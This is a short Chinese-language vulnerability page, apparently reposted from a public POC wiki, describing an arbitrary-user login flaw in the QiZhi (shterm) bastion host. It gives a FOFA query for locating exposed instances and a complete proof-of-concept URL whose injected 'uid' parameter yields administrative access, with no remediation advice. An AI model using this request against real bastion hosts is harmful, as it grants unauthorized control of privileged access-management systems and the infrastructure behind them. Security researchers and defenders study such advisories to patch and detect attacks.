齐治堡垒机_任意用户登录漏洞-棉花糖会员站

齐治堡垒机_任意用户登录漏洞

7月15日发布

020

# 齐治堡垒机任意用户登录漏洞

## 漏洞描述

齐治堡垒机存在任意用户登录漏洞，访问特定的Url即可获得后台权限

## 漏洞影响

> [!NOTE]
>
> 齐治堡垒机

## FOFA

> [!NOTE]
>
> app=”齐治科技-堡垒机”

## 漏洞复现

漏洞POC为

“`
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
“`

![](/static/qingy/齐治堡垒机_任意用户登录漏洞/img/1.png)

## Goby & POC

> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login

![](/static/qingy/齐治堡垒机_任意用户登录漏洞/img/2.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容